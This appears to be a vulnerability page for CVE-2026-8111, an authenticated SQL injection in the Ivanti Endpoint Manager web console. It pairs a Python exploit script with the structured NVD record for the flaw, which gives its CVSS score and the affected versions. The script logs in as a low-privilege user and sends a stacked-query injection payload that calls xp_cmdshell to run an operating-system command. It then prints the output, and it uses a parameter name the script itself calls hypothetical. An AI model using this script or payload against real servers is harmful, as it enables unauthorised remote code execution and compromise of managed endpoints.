CVE-2026-8111

import requests # Target URL example url = "https://target-epm:8080/endpoint-manager/vulnerable_api" # Attacker credentials (Low privilege required) session = requests.Session() login_payload = { "username": "low_priv_user", "password": "password123" } # 1. Authenticate to the web console print("[+] Attempting login...") login_response = session.post("https://target-epm:8080/login", data=login_payload, verify=False) if login_response.status_code == 200: print("[+] Login successful.") # 2. Send SQL Injection payload # Payload attempts to execute a system command via MSSQL xp_cmdshell # Note: The specific vulnerable parameter name is hypothetical injection_payload = { "search_id": "1'; EXECUTE master..xp_cmdshell 'whoami'; --" } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-8111-Scanner/1.0" } print("[+] Sending exploitation payload...") exploit_response = session.post(url, json=injection_payload, headers=headers, verify=False) # 3. Check response for command execution output if exploit_response.status_code == 200: print("[+] Payload sent. Analyzing response:") print(exploit_response.text) else: print(f"[-] Exploit request failed with status: {exploit_response.status_code}") else: print("[-] Login failed. Check credentials.")

{"cve": {"id": "CVE-2026-8111", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2026-05-12T15:16:18.923", "lastModified": "2026-05-12T19:17:48.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection in the web console of Ivanti Endpoint Manager before version 2024 SU6 allows a remote authenticated attacker to achieve remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*", "versionEndIncluding": "2022", "matchCriteriaId": "372561DA-DEAF-47DA-99B3-8BBBDADFD91A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*", "matchCriteriaId": "6C7283FE-C10A-4E37-B004-15FB0CAC49A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*", "matchCriteriaId": "FC51EEA2-1C4C-4069-9704-7ACFE4773930"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*", "matchCriteriaId": "E1EF5E1B-9377-49D3-9BE3-62FC78E666A3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*", "matchCriteriaId": "749AADDA-834D-4EC0-B7FF-E136FD1984F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*", "matchCriteriaId": "698BF7A1-62A1-45B5-BF08-AB3F3AA0245C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su4:*:*:*:*:*:*", "matchCriteriaId": "4902A745-E7CB-4FC9-9BCB-89EFAB643237"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su4_security_release_1:*:*:*:*:*:*", "matchCriteriaId": "9DF8F788-0384-4E6B-844E-35ED79CA1F17"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su5:*:*:*:*:*:*", "matchCriteriaId": "BABFF9B3-92CE-4086-BE93-9A884F1210D5"}]}]}], "references": [{"url": "https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-EPM-May-2026?language=en_US", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "tags": ["Vendor Advisory"]}]}}